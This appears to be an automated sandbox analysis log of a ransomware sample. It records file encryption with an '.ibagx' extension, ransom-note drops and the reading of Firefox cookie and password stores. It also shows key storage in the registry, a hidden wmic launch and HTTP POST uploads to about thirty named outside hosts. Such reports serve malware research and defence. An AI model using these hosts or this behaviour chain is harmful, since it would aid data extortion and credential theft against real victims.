Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log.ibagx source_filename = C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa True 1
Fn
Move \??\C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred.ibagx source_filename = C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred True 1
Fn
Move \??\C:\Users\Default\Contacts\Administrator.contact.ibagx source_filename = C:\Users\Default\Contacts\Administrator.contact True 1
Fn
Move \??\C:\Users\Default\Favorites\Links\Web Slice Gallery.url.ibagx source_filename = C:\Users\Default\Favorites\Links\Web Slice Gallery.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url.ibagx source_filename = C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Autos.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Autos.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Money.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Money.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN Sports.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN Sports.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSN.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSN.url True 1
Fn
Move \??\C:\Users\Default\Favorites\MSN Websites\MSNBC News.url.ibagx source_filename = C:\Users\Default\Favorites\MSN Websites\MSNBC News.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Get Windows Live.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Get Windows Live.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url True 1
Fn
Move \??\C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url.ibagx source_filename = C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT.LOG1.ibagx source_filename = C:\Users\Default\NTUSER.DAT.LOG1 True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms True 1
Fn
Move \??\C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.ibagx source_filename = C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms True 1
Fn
Move \??\C:\Users\Default\ntuser.ini.ibagx source_filename = C:\Users\Default\ntuser.ini True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\40id.mkv.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\40id.mkv True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite True 1
Fn
Move \??\C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp.ibagx source_filename = C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp True 1
Fn
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite size = 1048576, size_out = 524288 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key3.db size = 1048576, size_out = 16384 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\places.sqlite size = 1048576, size_out = 1048576 True 1
Fn
Data
Read C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite size = 1048576, size_out = 327680 True 1
Fn
Data
Write C:\Program Files\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
Write C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\IBAGX-DECRYPT.html size = 65302 True 1
Fn
Data
For performance reasons, the remaining 1719 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (42)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\ex_data\data - True 1
Fn
Create Key HKEY_CURRENT_USER\SOFTWARE\keys_data\data - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\keys_data\data - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 3, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 4, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 5, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 6, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 7, data = 48 False 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 8, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 120 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 120 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\ex_data\data value_name = ext, size = 14, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\SOFTWARE\keys_data\data value_name = public, size = 276, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\SOFTWARE\keys_data\data value_name = private, size = 1688, type = REG_BINARY True 1
Fn
Data
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\wbem\wmic.exe show_window = SW_HIDE True 1
Fn
Open System Idle Process - False 1
Fn
Module (1666)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\ntdll.dll base_address = 0x77230000 True 3
Fn
Get Handle c:\windows\system32\advapi32.dll base_address = 0x769f0000 True 830
Fn
Get Address c:\windows\system32\ntdll.dll function = RtlComputeCrc32, address_out = 0x7723dd8a True 2
Fn
Get Address c:\windows\system32\advapi32.dll function = CryptGenRandom, address_out = 0x769fdfc8 True 830
Fn
Get Address c:\windows\system32\ntdll.dll function = NtSetInformationFile, address_out = 0x77276638 True 1
Fn
System (496)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = CRH2YWU7 True 2
Fn
Sleep duration = -1 (infinite) True 1
Fn
Get Time type = Ticks, time = 142709 True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:05 (UTC) True 13
Fn
Get Time type = System Time, time = 2018-09-24 10:36:07 (UTC) True 13
Fn
Get Time type = System Time, time = 2018-09-24 10:36:08 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:09 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:10 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:11 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:13 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:16 (UTC) True 21
Fn
Get Time type = System Time, time = 2018-09-24 10:36:17 (UTC) True 10
Fn
Get Time type = System Time, time = 2018-09-24 10:36:18 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:19 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:20 (UTC) True 21
Fn
Get Time type = System Time, time = 2018-09-24 10:36:21 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:22 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:23 (UTC) True 7
Fn
Get Time type = System Time, time = 2018-09-24 10:36:24 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:25 (UTC) True 17
Fn
Get Time type = System Time, time = 2018-09-24 10:36:26 (UTC) True 16
Fn
Get Time type = System Time, time = 2018-09-24 10:36:27 (UTC) True 7
Fn
Get Time type = System Time, time = 2018-09-24 10:36:28 (UTC) True 17
Fn
Get Time type = System Time, time = 2018-09-24 10:36:29 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:30 (UTC) True 5
Fn
Get Time type = System Time, time = 2018-09-24 10:36:33 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:34 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:35 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:36 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:37 (UTC) True 6
Fn
Get Time type = System Time, time = 2018-09-24 10:36:38 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:39 (UTC) True 4
Fn
Get Time type = System Time, time = 2018-09-24 10:36:41 (UTC) True 8
Fn
Get Time type = System Time, time = 2018-09-24 10:36:42 (UTC) True 9
Fn
Get Time type = System Time, time = 2018-09-24 10:36:43 (UTC) True 11
Fn
Get Time type = System Time, time = 2018-09-24 10:36:44 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:45 (UTC) True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:47 (UTC) True 2
Fn
Get Time type = System Time, time = 2018-09-24 10:36:50 (UTC) True 2
Fn
Get Time type = Ticks, time = 189229 True 1
Fn
Get Time type = Ticks, time = 190321 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 245
Fn
Get Info type = Hardware Information True 2
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Mutex (2)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\8B5BA8B9F369050F5F4C.lock True 1
Fn
Open mutex_name = Global\XlAKFoxSKGOfSGOoSFOOFNOLPE, desired_access = SYNCHRONIZE False 1
Fn
Network Behavior
HTTP Sessions (59)
»
Information Value
Total Data Sent 14.22 KB
Total Data Received 72 bytes
Contacted Host Count 30
Contacted Hosts www.billerimpex.com, www.macartegrise.eu, www.poketeg.com, perovaphoto.ru, asl-company.ru, www.fabbfoundation.gm, www.perfectfunnelblueprint.com, www.wash-wear.com, pp-panda74.ru, cevent.net, bellytobabyphotographyseattle.com, alem.be, boatshowradio.com, dna-cp.com, acbt.fr, wpakademi.com, www.cakav.hu, www.mimid.cz, 6chen.cn, goodapd.website, oceanlinen.com, tommarmores.com.br, nesten.dk, zaeba.co.uk, www.n2plus.co.th, koloritplus.ru, h5s.vn, marketisleri.com, www.toflyaviacao.com.br, www.rment.in
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.billerimpex.com
Server Port 80
Data Sent 244
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.billerimpex.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.billerimpex.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.billerimpex.com
Server Port 443
Data Sent 269
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.billerimpex.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/image/dekese.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.billerimpex.com/content/image/dekese.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #3
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.macartegrise.eu
Server Port 80
Data Sent 242
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.macartegrise.eu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.macartegrise.eu/ False 1
Fn
HTTP Session #4
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.macartegrise.eu
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.macartegrise.eu, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/images/zuhe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.macartegrise.eu/uploads/images/zuhe.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #5
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.poketeg.com
Server Port 80
Data Sent 234
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.poketeg.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.poketeg.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.poketeg.com
Server Port 80
Data Sent 257
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.poketeg.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/imgs/thseda.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.poketeg.com/static/imgs/thseda.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #7
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name perovaphoto.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = perovaphoto.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = perovaphoto.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #8
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name perovaphoto.ru
Server Port 80
Data Sent 253
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = perovaphoto.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/pics/fudada.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = perovaphoto.ru/data/pics/fudada.bmp True 1
Fn
Data
Close Session - True 58
